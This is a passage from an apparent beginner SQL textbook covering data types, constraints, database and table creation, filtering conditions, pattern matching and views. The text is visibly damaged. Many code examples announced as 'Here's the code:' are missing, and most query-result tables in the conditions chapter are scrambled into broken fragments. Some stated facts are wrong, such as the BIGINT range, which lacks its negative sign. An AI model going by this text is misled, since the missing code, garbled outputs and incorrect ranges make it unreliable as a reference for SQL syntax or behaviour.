1. Character types 2. Number types 3. Date/Time types Character types consist of text. Number types contain amounts or numbers. Date/Time types consist of a recorded date or time. Listed below are some of the types of data of each category. Character Data Types • CHAR(size)- A fixed length string can be held with this data type. It is able to hold special characters, letters and numbers. This can store up to 255 characters. • VARCHAR(size)- This can hold a variable string length which is able to hold special characters, letters and numbers. The size will be specified in parenthesis. It can store up to 255 characters. This will automatically be a text type that it is converted to if the value is placed higher than 255 characters. • TINYTEXT- This holds a string with 255 characters of maximum length. • TEXT- This holds a string with 65,535 characters of maximum length. • MEDIUMTEXT- This holds a string with 16,777,215 of maximum characters. • LONGTEXT- This holds a string with 4,294,967,295 of maximum characters. • BLOB- These hold 65,535 bytes of maximum data. • MEDIUMBLOB- These hold 16,777,215 bytes of maximum data. • LONGBLOB- These hold 4,294,967,295 bytes of maximum data. • ENUM(x,y,z, etc.)- A list that contains possible values. This list can hold 65535 max values. When a value is entered into the list that isn’t contained inside that list, a blank value will be entered instead. The order that the values are entered is how they will also be sorted. • SET- This is similar to the ENUM data type. This data type holds a maximum of 64 list items and is able to store more than one choice. Number Data Types The most common of the options are listed below along with their storage

type when it comes to bytes and values: • TINYINT(size)- Holds -128 to 127, or 0 to 255 unsigned. • SMALLINT(size)- Holds -32768 to 32767, or 0 to 65535 unsigned. • MEDIUMINT(size)- Holds -8388608 to 8388607, or 16,777,215 unsigned. • INT(size)- Holds -2,147,483,648 to 2,147,483,647, or 4,294,967,295 unsigned. • BIGINT(size)- Holds 9,223,372,036,854,775,808 to 9,223,372,036,854,775,807 or 18,446,744,073,709,551,615 unsigned. • FLOAT(size,d)- This is a tiny number with a decimal point that can float. Specified in the size parameter is the maximum amount of digits. Specified in the d parameter is the maximum amount of digits in the right of the decimal point. • DOUBLE(size,d)- This is a large number with a decimal point that floats. The maximum number of digits may be specified in the size parameter (size). The maximum number of digits to the right of the decimal point is specified in the d parameter (d). • DECIMAL(size,d)- This type is string that is stored which allows a decimal point that is fixed. The maximum number of digits may be specified in the size parameter (size). Specified in the d parameter is the maximum amount of digits to the right of the decimal point. An extra option is found in integer types that is called unsigned. Normally, an integer will go from a value of negative to positive. When adding the unsigned attribute will be able to move the range up higher so that it will not start at a negative number, but a zero. That is why the unsigned option is mentioned after the specified numbers listed for the different data types. Date/Time Data Types The options for date are: • DATE()- This is in order to enter a date in the format of YYYY-MM-DD as in 2016-04-19 (April 19th, 2016) • DATETIME()- This is in order to enter a combination of date and time in the format of YYYY-MM-DD and HH:MM:SS as in 13:30:26 (1:30 p.m. at

26 seconds) • TIMESTAMP()- This is in order to enter to store the number of seconds and match the current time zone. The format is YYYY-MM-DD HH:MM:SS. • TIME()- This will allow you to enter the time. The format is HH:MM:SS. • YEAR()- This is in order to enter a year in a two or four digit format. A four-digit format would be as 2016 or 1992. A two digit format would be as 72 or 13. It is important to note that if the DATETIME and TIMESTAMP will return to the same format. When compared to each other, they will still work in different ways. The TIMESTAMP will automatically update to the current time and date of the time zone present TIMESTAMP will also accept other various formats available such as YYYYMMDDHHMMSS, YYMMDDHHMMSS, YYYYMMDD, and also YYMMDD.

Chapter 6 SQL Constraints Constraints refer to the rules or restrictions that will be applied on a table or its columns. These rules are applied to ensure that only specific data types can be used on a table. The use of constraints helps ensure the accuracy and reliability of data. You can specify constraints on a table or column level. When constraints are specified on a column level, they are only applicable to a specific column. When they are defined on a table basis, they are implemented on the entire table. SQL offers several types of constraints. Following are the most commonly used ones: PRIMARY Key FOREIGN Key UNIQUE Key INDEX NOT NULL CHECK Constraint DEFAULT Constraint PRIMARY Key A Primary Key is a unique value which is used to identify a row or record. There is only one primary key for each table but it may consist of multiple fields. A column that had been designated as a primary key can’t contain NULL values. In general, a primary key is designated during the table creation stage. Creating a Primary Key The following statement creates a table named Employees and designates the ID field as its primary key:

You may also specify a primary key constraint later using the ALTER TABLE statement. Here’s the code for adding a primary constraint to the EMPLOYEES table:

Deleting Primary Key Constraint To remove the primary key constraint from a table, you will use the ALTER TABLE with the DROP statement. You may use this statement: FOREIGN Key A foreign key constraint is used to associate a table with another table. Also known as referencing key, the foreign key is commonly used when you’re working on parent and child tables. In this type of table relationship, a key in the child table points to a primary key in the parent table. A foreign key may consist of one or several columns containing values that match the primary key in another table. It is commonly used to ensure referential integrity within the database. The diagram below will demonstrate the parent-child table relationship:

The EMPLOYEES_TBL is the parent table. It contains important information

about employees and uses the field emp_id as its primary key to identify each employee. The EMPLOYEES_SALARY_TBL contains information about employees’ salary, position, and other details. It is logical to assume that all salary data are associated with a specific employee entered in the EMPLOYEES_TBL. You can enforce this logic by adding a foreign key on the EMPLOYEES_SALARY_TBL and setting it to point to the primary key of the EMPLOYEES_TBL. This will ensure that the data for each employee in the EMPLOYEES_SALARY_TBL are referenced to the specific employee listed in the EMPLOYEES_TBL. Consequently, it will also prevent the EMPLOYEES_SALARY table from storing data for names that are not included in the EMPLOYEES table. To demonstrate how to set up the foreign key constraint, create a table named EMPLOYEE with the following statement:

The EMPLOYEE table will serve as the parent table. Next, create a child table that will refer to the EMPLOYEES table:

Notice that the ID column in the EMPLOYEE_SALARY TABLE references the ID column in the EMPLOYEE table. At this point, you may want to see the structure of the EMPLOYEE_SALARY TABLE. You can use the DESC command to do this: DESC EMPLOYEE_SALARY;

The FOREIGN KEY constraint is typically specified during table creation but you can still add a foreign key to existing tables by modifying the table. For this purpose, you will use the ALTER TABLE command. For example, to add a foreign key constraint to the EMPLOYEE_SALARY table, you will use this statement:

Removing FOREIGN KEY constraint To drop a FOREIGN KEY constraint, you will use this simple syntax:

NOT NULL A column contains NULL VALUES by default. To prevent NULL values from populating the table’s column, you can implement a NOT NULL constraint on the column. Bear in mind that the word NULL pertains to unknown data and not zero data. To illustrate, the following code creates the table STUDENTS and defines six columns:

Notice the NOT NULL modifier on the columns ID, LAST_NAME, FIRST_NAME, and AGE. This means that these columns will not accept NULL values. If you want to modify a column that takes a NULL value to one that does not accept NULL values, you can do so with the ALTER TABLE statement. For instance, if you want to enforce a NOT NULL constraint on the column LOCATION, here’s the code:

UNIQUE Key A UNIQUE key constraint is used to ensure that all column values are unique. Enforcing this constraint prevents two or more rows from holding the same values in a particular column. For example, you can apply this constraint if you don’t want two or more students to have the same LAST_NAME in the STUDENTS table. Here’s the code:

You can also use the ALTER TABLE statement to add a UNIQUE constraint to an existing table. Here’s the code:

You may also add constraint to more than one column by using ALTER TABLE with ADD CONSTRAINT:

Removing a UNIQUE constraint To remove the myUniqueConstraint, you will use the ALTER TABLE with the DROP statement. Here’s the syntax:

DEFAULT Constraint The DEFAULT constraint is used to provide a default value whenever the user fails to enter a value for a column during an INSERT INTO operation. To demonstrate, the following code will create a table named EMPLOYEES with five columns. Notice that the SALARY column takes a default value (4000.00) which will be used if no value was provided when you add new

records:

You may also use the ALTER STATEMENT to add a DEFAULT constraint to an existing table:

Removing a Default Constraint To remove a DEFAULT constraint, you will use the ALTER TABLE with the DROP statement:

CHECK Constraint A CHECK constraint is used to ensure that each value entered in a column satisfies a given condition. An attempt to enter a non-matching data will result to a violation of the CHECK constraint which will cause the data to be rejected. For example, the code below will create a table named GAMERS with five columns. It will place a CHECK constraint on the AGE column to ensure that there will be no gamers under 13 years old on the table.

You can also use the ALTER TABLE statement with MODIFY to add the CHECK constraint to an existing table:

INDEX Constraint The INDEX constraint lets you build and access information quickly from a database. You can easily create an index with one or more table columns. After the INDEX is created, SQL assigns a ROWID to each row prior to sorting. Proper indexing can enhance the performance and efficiency of large databases. Here’s the syntax:

For instance, if you need to search for a group of employees from a specific location in the EMPLOYEES table, you can create an INDEX on the column LOCATION. Here’s the code:

Removing the INDEX Constraint To remove the INDEX constraint, you will use the ALTER TABLE statement with DROP.

Chapter 7 Databases In this chapter, I will talk about different database-related operations. You need to learn these operations as part of learning SQL. The operations that I am talking about here are how to create a data base, how to select a database, and finally how, if need be, you can drop a data base from your SQL Server. I will teach you how to do these operations with queries and with the help of the graphical user interface of SQL Server. So, let’s start with creating a data base. Start your SQL Server and connect to the SQL instance that you have created while setting up SQL Server. Click on the new Query option available on the “Standard” toolbar available under the main menu. After you click on the new query button, a window will open up, and you will see a text editor on your screen. On the text editor, write the following query: Create database Employee; Click on the Execute button that has an exclamation mark in red color. After execution, you will see a message stating that your command ran successfully. Now, to see the newly created database, go to the left side of you screen, where a navigation panel is present. Look for a folder that says ‘databases’ and expand it. You will now see the list of databases present in the current instance of SQL. Now, let’s look at a way you can create a database by using the navigation panel. Right Click on the database folder, and then select ‘new database option’. Once you do that, a new window will open up. Use this window to pass on the name of your database, and click on the “Ok” button. If all things go well, you will now have a new database. You can go to the navigation panel and look through the list of databases available for your newly created database. To select your newly created database, you can use the following SQL statement before writing the rest of your SQL query: Use Employee; The aforementioned statement ensures that your query will be executed on the database you explicitly mentioned. You can select you desired database using the SQL Server’s GUI. Near the new query option, there is a dropdown list that contains names of all the databases present in the current

instance of SQL. Go on and select your database from the said drop-down list. Now that we have talked about how we can create and select a database in SQL Server, let’s move on and see how you can safely delete or drop a database. When you perform a drop operation on a database, the database gets deleted permanently from the SQL Server’s instance. I will drop the Employee’s database that I created for this tutorial. This database doesn’t contain any data so far, but that doesn’t concern the drop SQL statement. Here’s the query to drop the database: Example: Drop Database Employee; If all things go well, you will see the following message as an output in the messages window. Output: Command(s) completed successfully. So now, let’s see how you can drop a database using the SQL Server’s graphical user interface. Right click on the name of any database that you want to delete (make sure you have created a test database for this exercise). After you right click on the name of a database, you will see the delete option; click on it. A new window will open up; make sure you check the box that says close existing connections available at the bottom of the window. Closing existing connections allows you to safely delete your databases. With queries, this happens automatically, but when you delete your database using the GUI, you need to select this option so that if some project is using this database, the connection to that project will be closed before the drop option goes on. That’s all you need to know about databases at this point of your learning curve.

Chapter 8 Tables Tables are data structures that hold some sort of data. In SQL, tables are often referred to as relations too. The reason behind tables being called relations is that relationships like one to one, one to many, and many to many exist between tables. I will talk about these relations and what they mean in a later part of this book, so let’s just focus here on tables. In this chapter, I will teach you guys how you can create, alter, and delete/drop a table. I will also give you a peek into how you can select data from a single table in this chapter. We will talk about complex select queries later on in this book, so don’t worry. So, let’s start with creating a table. In order to create a table, you must have a database which will hold all your tables and their data. I took the liberty and set an Employee database in my SQL Server. Go on, create Employee database. I am assuming that you have successfully created a database. Write the following query in the new query text editor: Example: Use Employee; CREATE TABLE Employee ( StafID INT

NOT NULL,

StafName VARCHAR (20) StafAGE INT

NOT NULL,

NOT NULL,

StafADDRESS CHAR (25), StafSALARY DECIMAL (18, 2), PRIMARY KEY (StafID) ); Output: Command(s) completed successfully. The example above contains an SQL query that will use the Employee database and will create a table inside this database. The name of that table will be Employee as you can see the second line of the query. StafID, StafName, StafAGE, StafADDRESS and StafSALARY are

columns/attributes of this table. Right next to the name of columns, the datatype of each column is mentioned. The NOT NULL specifier tells SQL Server that this column can’t hold NULL values. That means that you have to pass a value for the non-null able columns if you are trying to insert data into this table. PRIMARY KEY (StafID) The line above says the StafID column will be used as a primary key column. Primary keys have some properties i.e. the primary key column should hold unique values, and each primary key value is related to an entire tuple or record in an SQL table. Now that we have created a table, let’s insert some data into it. I will use the Employee database to add details about different employees using the employee table. The query to insert data in a table looks like the following example: Example: Insert into Employee (StafID,StafName,StafAGE,StafADDRESS,StafSALARY) Values(1,'John','23','America', '5000'); Insert into Employee (StafID,StafName,StafAGE,StafADDRESS,StafSALARY) Values(2,'Mike','32','Africa', '4000'); Insert into Employee (StafID,StafName,StafAGE,StafADDRESS,StafSALARY) Values(3,'Sara','43','America', '6000'); Insert into Employee (StafID,StafName,StafAGE,StafADDRESS,StafSALARY) Values(4,'Aaron','56','America', '15000'); Insert into Employee (StafID,StafName,StafAGE,StafADDRESS,StafSALARY) Values(5,'Talha','24','Pakistan', '10000'); Output: (1 row(s) affected)

(1 row(s) affected) (1 row(s) affected) (1 row(s) affected) (1 row(s) affected) So far, we have created a database, and further, we have added a table into that database. In the example above, I inserted data into the Employee table. The output of the above-mentioned query only showed whether my query was successful or not or how many rows it affected in case of a successful query, as you can see in the output shown above. Now, let’s see how you can see the data present in a table. To see the contents of an SQL table, we can use the SQL Select statement. Example: /****** Script for SelectTopNRows command from SSMS ******/ SELECT TOP 1000 [StafID] ,[StafName] ,[StafAGE] ,[StafADDRESS] ,[StafSALARY] FROM [Employee].[dbo].[Employee]; The query above is selecting the top 1000 rows of the table: Employee. You can select all records by removing TOP 1000. If you don’t want to mention the column names in a query, you can simply put an asterisk after the select keyword and create a select query: /****** Script for SelectTopNRows command from SSMS ******/ SELECT * FROM [Employee].[dbo].[Employee]; The output of both queries mentioned above will be following: Output: StafID StafName 1 John 2 Mike

StafAGE StafADDRESS 23 America 32 Africa

StafSALARY 5000.00 4000.00

3 Sara 43 America 6000.00 4 Aaron 56 America 15000.00 5 Talha 24 Pakistan 10000.00 You can truncate an SQL table using SQL command: Truncate. Truncate deletes all the data inside a table, but it doesn’t delete or modify the structure of the table. After a successful truncate operation, you will be left with an empty table. To truncate Employee’s table, use the following query: Example: Truncate Table Employee; Output: Command(s) completed successfully. Now, if you select the records of Employee table, you will find out that it’s empty and the records that you inserted earlier are not there anymore. If you want to drop the table and its data, use the Drop command. Example: Drop Table Employee; Output: Command(s) completed successfully. After the successful execution of drop command, the Employee table will be deleted. There exists three relationship types between tables. A one-to-one relationship between two tables means that a single record from table A will only be associated to a single row in table B. A one-to-many relationship suggests that a single record from table A will be related to more than one record present in table B. For example, a single employee, Aaron, could serve more than one customer, hence a one-to-many relationship exists between employees and customers. In a many-to-many relationship, multiple rows from table A can be associated with multiple rows of table B. For example, a course can have many registered students and many students could have registered more than one course. The list of examples goes on and on. It will be a good exercise for you to come up with at least five examples for each relationship type.

Chapter 9 Defining Your Condition There is no doubt that a data server can handle many complications, provided everything is defined clearly. Conditions are defined with the help of expressions, which may consist of numbers, strings, in built functions, sub queries, etc. Furthermore, conditions are always defined with the help of operators which may be comparison operators(=, !=, ,, Like,IN, BETWEEN, etc) or arithmetic operators(+, -,*,/); All these things are used together to form a condition. Now let’s move onto Condition Types. Types of Conditions In order to remove unwanted data from our search, we can use these conditions. Let’s have a look at some of these condition types. Equality Condition Conditions that use the equal sign ‘=’ to equate one condition to another are referred to as equality conditions. You have used this condition many times at this point. If we want to know the name of the HOD for Genetic Engineering department, we would do the following: (1) First go to ENGINEERING_STUDENTS table and find the ENGG_ID for ENGG_NAME ‘Genetic’, SELECT ENGG_ID FROM ENGINEERING_STUDENTS WHERE ENGG_NAME ='Genetic'; + - - - - - - - -+ | ENGG_ID | + - - - - - - - -+ | 3 | + - - - - - - - -+ (2) Then go to Dept_Data table and find the value in HOD column for ENGG_ID = 3. SELECT HOD FROM DEPT_DATA where ENGG_ID='3'; +---------+ | HOD

|

+---------+ | Victoria Fox | +---------+ In the first step, we equated the value of column ENGG_NAME to the string value of ‘Genetic’. SELECT e. ENGG_NAME ,e.STUDENT_STRENGTH, d.HOD,d.NO_OF_Prof FROM ENGINEERING_STUDENTS e INNER JOIN DEPT_DATA d ON e.ENGG_ID = d.ENGG_ID WHERE e.ENGG_NAME = 'Genetic'; +-----------+------------------+--------+-----------+ | ENGG_NAME | STUDENT_STRENGTH | HOD NO_OF_Prof |

|

+-----------+------------------+--------+-----------+ | Genetic | 75 | Victoria Fox | 7 | +-----------+------------------+--------+-----------+ In the above query, we have all the information in one result set by using an INNER JOIN and using equality condition twice. Inequality Condition The inequality condition is the opposite of equality condition and is expressed by ‘!=’ and the ‘’ symbol. SELECT e. ENGG_NAME ,e.STUDENT_STRENGTH, d.HOD,d.NO_OF_Prof FROM ENGINEERING_STUDENTS e INNER JOIN DEPT_DATA d ON e.ENGG_ID = d.ENGG_ID WHERE e.ENGG_NAME 'Genetic';

+--------------+--------------------+-----------+--------+ ENGG_NAME NO_OF_Prof |

| STUDENT_STRENGTH

| HOD

|

+--------------+--------------------+-----------+--------+ | Electronics 7 | | Software 6 |

|

150 | Miley Andrews |

|

250 | Alex Dawson

| Mechanical Joseph |5

|

150 | Anne

| Biomedical 8 |

|

72 | Sophia Williams |

| Instrumentation 4 |

|

80 | Olive Brown

| Chemical 6

|

75 | Joshua Taylor

|

|

60 | Ethan Thomas

|

| Civil 5

|

|

|

| |

| Electronics & Com | 8 | | Electrical | 5 |

250 | Michael Anderson | 60 | Martin Jones

|

+--------------+--------------------+-----------+--------+ The statement is the same as saying: SELECT e. ENGG_NAME ,e.STUDENT_STRENGTH, d.HOD,d.NO_OF_Prof FROM ENGINEERING_STUDENTS e INNER JOIN DEPT_DATA d ON e.ENGG_ID = d.ENGG_ID

WHERE e.ENGG_NAME != 'Genetic'; If you execute the above statement on the command window, you will receive the same result set. Using the equality condition to modify data Suppose the institute decides to close the Genetic Department; in that case, it is important to delete the records from the database as well. First, find out what is the ENGG_ID for ‘Genetic’ so that SELECT * FROM ENGINEERING_STUDENTS WHERE ENGG_NAME='Genetic'; + - - - - - - - - - + - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - - + | ENGG_ID

| ENGG_NAME | STUDENT_STRENGTH |

+ - - - - - - - - - + - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - - + |

3 | Genetic

|

75 |

+ - - - - - - - - - + - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - - + Now from DEPT_DATA we will DELETE the row having ENGG_ID =’3’ DELETE FROM DEPT_DATA WHERE ENGG_ID ='3'; Next, we need to check if the data has been actually deleted or not: SELECT * FROM DEPT_DATA; + - - - - - -+ - - - - - - - - - - - -+ - - - - - - - - - + - - - - - - - -+ | Dept_ID | HOD

| NO_OF_Prof | ENGG_ID |

+ - - - - - -+ - - - - - - - - - - - -+ - - - - - - - - - + - - - - - - - -+ | 100 | Miley Andrews | 7 | 1| |

101 | Alex Dawson

|6

|

2|

|

103 | Anne Joseph

|5

|

4|

|

104 | Sophia Williams

|8

|

5|

|

105 | Olive Brown

|4

|

6|

|

106 | Joshua Taylor

|6

|

7|

|

8| 9|

| |

107 | Ethan Thomas |5 108 | Michael Anderson | 8

|

|

109 | Martin Jones

|5

|

10 |

+ - - - - - -+ - - - - - - - - - - - -+ - - - - - - - - - + - - - - - - - -+ Then delete the row from ENGINEERING_STUDENTS where the ENGG_ID is 3. DELETE FROM ENGINEERING_STUDENTS WHERE ENGG_ID='3'; Lastly, check if the row has been deleted from ENGINEERING_STUDENTS: SELECT * FROM ENGINEERING_STUDENTS; + - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+ | ENGG_ID | ENGG_NAME

| STUDENT_STRENGTH |

+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+ |

1 | Electronics

|

150 |

| |

2 | Software 4 | Mechanical

| |

250 | 150 |

|

5 | Biomedical

|

72 |

|

6 | Instrumentation

|

80 |

|

7 | Chemical

|

75 |

|

8 | Civil

|

60 |

|

9 | Electronics & Com |

250 |

| 10 | Electrical | 60 | + - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - - + Note the records have been successfully deleted from both areas. Same way the equality condition can be used to update data as well. Conditions used to define range We have seen examples of range previously, but we will delve a little deeper to solidify that knowledge . We want to write queries to define a range to ensure our expression is within the desired range. SELECT * FROM ENGINEERING_STUDENTS WHERE STUDENT_STRENGTH>175

+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+ | ENGG_ID | ENGG_NAME

| STUDENT_STRENGTH |

+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+ | |

2 | Software | 9 | Electronics & Com |

250 | 250 |

+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+ Have a look at another simple example: SELECT * FROM ENGINEERING_STUDENTS WHERE 300>STUDENT_STRENGTH AND STUDENT_STRENGTH>78; + - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+ | ENGG_ID | ENGG_NAME

| STUDENT_STRENGTH |

+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+ | 1 | Electronics | 150 | |

2 | Software

|

250 |

|

4 | Mechanical

|

150 |

|

6 | Instrumentation

|

80 |

|

9 | Electronics & Com |

250 |

+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+ Next, we will define the same query using the BETWEEN operator. While defining a range using the BETWEEN operator, specify the lesser value first and the higher value later. SELECT * FROM ENGINEERING_STUDENTS WHERE STUDENT_STRENGTH BETWEEN 78 AND 300; + - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+ | ENGG_ID | ENGG_NAME

| STUDENT_STRENGTH |

+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+ |

1 | Electronics

|

150 |

|

2 | Software

|

250 |

|

4 | Mechanical

|

150 |

|

6 | Instrumentation

|

80 |

|

9 | Electronics & Com |

250 |

+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+ Membership Conditions Sometimes the requirement is not looking for values in a range, but in a set of certain values. To give you a better idea, suppose that you need to find the details for ‘Electronics’, ‘Instrumentation’ and ‘Mechanical’: SELECT * FROM ENGINEERING_STUDENTS WHERE ENGG_NAME = 'Electronics' OR ENGG_NAME = 'Mechanical' OR ENGG_NAME = 'Instrumentation'; +---------+-------------+------------------+ | ENGG_ID

| ENGG_NAME

| STUDENT_STRENGTH |

+---------+-------------+------------------+ |

1 | Electronics

|

150 |

| |

4 | Mechanical 6 | Instrumentation

| |

150 | 80 |

+---------+-------------+------------------+ We can simplify the above query and get the right result sets using the IN operator: SELECT * FROM ENGINEERING_STUDENTS WHERE ENGG_NAME IN ('Electronics', 'Instrumentation', 'Mechanical'); +---------+-------------+------------------+ | ENGG_ID

| ENGG_NAME

| STUDENT_STRENGTH |

+---------+-------------+------------------+ | 1 | Electronics | 150 | |

4 | Mechanical

|

150 |

|

6 | Instrumentation

|

80 |

+---------+-------------+------------------+ it is the same way if you want to find the data for Engineering fields other than ‘Electronics’, ‘Mechanical’ and ‘Instrumentation’ use the NOT IN

operator as shown below: SELECT * FROM ENGINEERING_STUDENTS WHERE ENGG_NAME NOT IN ('Electronics', 'Instrumentation', 'Mechanical'); +---------+-------------+------------------+ | ENGG_ID | ENGG_NAME | STUDENT_STRENGTH | +---------+-------------+------------------+ |

2 | Software

|

250 |

|

5 | Biomedical

|

72 |

|

7 | Chemical

|

75 |

|

8 | Civil

|

60 |

|

9 | Electronics & Com |

250 |

| 10 | Electrical | 60 | +---------+-------------+------------------+ Matching Conditions Suppose you meet all the HOD of the college in a meeting and you are very impressed by one HOD, but you only remember the name starts with ‘S’. You can use the following query to find the right person: SELECT * FROM DEPT_DATA WHERE LEFT(HOD,1)='S'; Here we are using a function left(). It has two parameters: The first value is a String, which is from the extracted resulted. Here, we will look in the column_name HOD. The second value determines how many characters should be extracted from the left. In this case, we remember the name starts with ‘S’ so we are just going to extract the first letter of each name in the HOD column to check if it matches ‘S’. The result is as shown below: +------+-----------+---------+---------+ | Dept_ID | HOD | NO_OF_Prof | ENGG_ID | +------+-----------+---------+---------+ |

104 | Sophia Williams | 8

|

5|

+------+-----------+---------+---------+

One more demonstration to help reinforce the concept: Suppose you want to look for people having the names starting with ‘Mi’: SELECT * FROM DEPT_DATA WHERE LEFT(HOD,2)='Mi'; +- - - - - - - - + - - - - - - - - - - - - - + - - - - - - - - - + - - - - - - - -+ | Dept_ID | HOD | NO_OF_Prof | ENGG_ID | +- - - - - - - - + - - - - - - - - - - - - - + - - - - - - - - - + - - - - - - - -+ |

100 | Miley Andrews

|7

|

1|

|

108 | Michael Anderson | 8

|

9|

+- - - - - - - - + - - - - - - - - - - - - - + - - - - - - - - - + - - - - - - - -+ Pattern Matching Pattern matching in another interesting feature you will enjoy, and will use often as a developer. The concept is simple; It allows you to use an underscore ( _ ) to match any single character and percentage sign(%) to match 0, 1, or more characters. Before moving ahead, know that two comparison operators: LIKE and NOT LIKE, are used in pattern matching. Now onto the exercises: Here is the same example where we want to find out the HOD with a name starting with ‘S’. SELECT * FROM DEPT_DATA WHERE HOD LIKE 'S%'; +------+-----------+---------+---------+ | Dept_ID | HOD

| NO_OF_Prof | ENGG_ID

|

+------+-----------+---------+---------+ | 104 | Sophia Williams | 8 | 5| +------+-----------+---------+---------+ Now, let’s look for HOD having name ending with ‘ws’: SELECT * FROM DEPT_DATA WHERE HOD LIKE '%ws'; + - - - - - -+ - - - - - - - - - - + - - - - - - - - - -+ - - - - - - - -+ | Dept_ID | HOD

| NO_OF_Prof | ENGG_ID |

+ - - - - - -+ - - - - - - - - - - + - - - - - - - - - -+ - - - - - - - -+

|

100 | Miley Andrews | 7

|

1|

+ - - - - - -+ - - - - - - - - - - + - - - - - - - - - -+ - - - - - - - -+ Let’s see if we can find a name containing the string ‘cha’. SELECT * FROM DEPT_DATA WHERE HOD LIKE '%cha%'; + - - - - - -+ - - - - - - - - - - - - -+ - - - - - - - - - -+ - - - - - - - -+ | Dept_ID | HOD

| NO_OF_Prof | ENGG_ID |

+ - - - - - -+ - - - - - - - - - - - - -+ - - - - - - - - - -+ - - - - - - - -+ |

108 | Michael Anderson | 8

|

9|

+ - - - - - -+ - - - - - - - - - - - - -+ - - - - - - - - - -+ - - - - - - - -+ The next example shows how to look for a five letter word with ‘i’ being the second letter of the word: SELECT * FROM ENGINEERING_STUDENTS WHERE ENGG_NAME LIKE '_i___'; + - - - - - - - - -+ - - - - - - - - - - - + - - - - - - - - - - - - - - - - - -+ | ENGG_ID

| ENGG_NAME | STUDENT_STRENGTH |

+ - - - - - - - - -+ - - - - - - - - - - - + - - - - - - - - - - - - - - - - - -+ |

8 | Civil

|

60 |

+ - - - - - - - - -+ - - - - - - - - - - - + - - - - - - - - - - - - - - - - - -+ Regular Expressions To add more flexibility to your search operations, you can make use of Regular expressions. It is a vast topic, so here are a few tips to make you comfortable when utilizing regular expressions: '^' indicates beginning of a string. '$' indicates the end of a string. Single characters are denoted by a '.'. [...] indicates any character that is listed between the square brackets [^...]indicates all characters that are not contained in the square brackets’ list

p1|p2|p3 is for matching any of the given patterns p1, p2, or p3 * denotes zero or more occurrences of elements that are preceding + indicates a single or multiple instances of elements that are preceding n instances is indicated by {n}. m through n is indicated by {m,n} Here are a few examples of regular expressions; Find all HOD having names that start with ‘M’: SELECT * FROM DEPT_DATA WHERE HOD REGEXP '^M'; + - - - - - - + - - - - - - - - - - - - - + - - - - - - - - - -+ - - - - - - - + | Dept_ID | HOD

| NO_OF_Prof | ENGG_ID |

+ - - - - - - + - - - - - - - - - - - - - + - - - - - - - - - -+ - - - - - - - + | 100 | Miley Andrews |7 | 1| |

108 | Michael Anderson | 8

|

109 | Martin Jones

|

|5

9|

|

10 |

+ - - - - - - + - - - - - - - - - - - - - + - - - - - - - - - -+ - - - - - - - + Look for HOD names that end with ‘ws’; SELECT * FROM DEPT_DATA WHERE HOD REGEXP 'ws$'; + - - - - - + - - - - - - - - - - -+ - - - - - - - - - + - - - - - - - - + | Dept_ID | HOD | NO_OF_Prof | ENGG_ID | + - - - - - + - - - - - - - - - - -+ - - - - - - - - - + - - - - - - - -+ |

100 | Miley Andrews | 7

|

1|

+ - - - - - + - - - - - - - - - - -+ - - - - - - - - - + - - - - - - - + NULL Before we end this chapter, here is something you must know about the NULL operator. NULL is defined as absence of value. An expression can be NULL but it cannot be equal to NULL. Also, two NULL operators are never equal to each other. Whenever you have to check an expression, don’t write

WHERE COLUMN_NAME = NULL. The proper method is writing COLUMN_NAME IS NULL.

Chapter 10 Views VIEWS are virtual tables or stored SQL queries in the databases that have predefined queries and unique names. They are actually the resulting tables from your SQL queries. As a beginner, you may want to learn about how you can use VIEWS. Among their numerous uses is their flexibility can combine rows and columns from VIEWS. Here are important pointers and advantages in using VIEWS: 1. You can summarize data from different tables, or a subset of columns from various tables. 2. You can control what users of your databases can see, and restrict what you don’t want them to view. 3. You can organize your database for your users’ easy manipulation, while simultaneously protecting your non-public files. 4. You can modify, or edit, or UPDATE your data. Sometimes there are limitations, though, such as, being able to access only one column when using VIEW. 5. You can create columns from various tables for your reports. 6. You should increase the security of your databases because VIEWS can display only the information that you want displayed. You can protect specific information from other users. 7. You can provide easy and efficient accessibility or access paths to your data to users. 8. You can allow users of your databases to derive various tables from your data without dealing with the complexity of your databases. 9. You can rename columns through views. If you are a website owner, VIEWS can also provide domain support. 10. The WHERE clause in the SQL VIEWS query may not contain subqueries.

11. For the INSERT keyword to function, you must include all NOT NULL columns from the original table. 12. Do not use the WITH ENCRIPTION (unless utterly necessary) clause for your VIEWS because you may not be able to retrieve the SQL. 13. Avoid creating VIEWS for each base table (original table). This can add more workload in managing your databases. As long as you create your base SQL query properly, there is no need to create VIEWS for each base table. 14. VIEWS that use the DISTINCT and ORDER BY clauses or keywords may not produce the expected results. 15. VIEWS can be updated under the condition that the SELECT clause may not contain the summary functions; and/or the set operators, and the set functions. 16. When UPDATING, there should be a synchronization of your base table with your VIEWS table. Therefore, you must analyze the VIEW table, so that the data presented are still correct, each time you UPDATE the base table. 17. Avoid creating VIEWS that are unnecessary because this will clutter your catalogue. 18. Specify “column_names” clearly. 19. The FROM clause of the SQL VIEWS query may not contain many tables, unless specified. 20. The SQL VIEWS query may not contain HAVING or GROUP BY. 21. The SELECT keyword can join your VIEW table with your base table. How to create VIEWS You can create VIEWS through the following easy steps: Step #1 - Check if your system is appropriate to implement VIEW queries. Step #2 - Make use of the CREATE VIEW SQL statement. Step #3 – Use key words for your SQL syntax just like with any other SQL

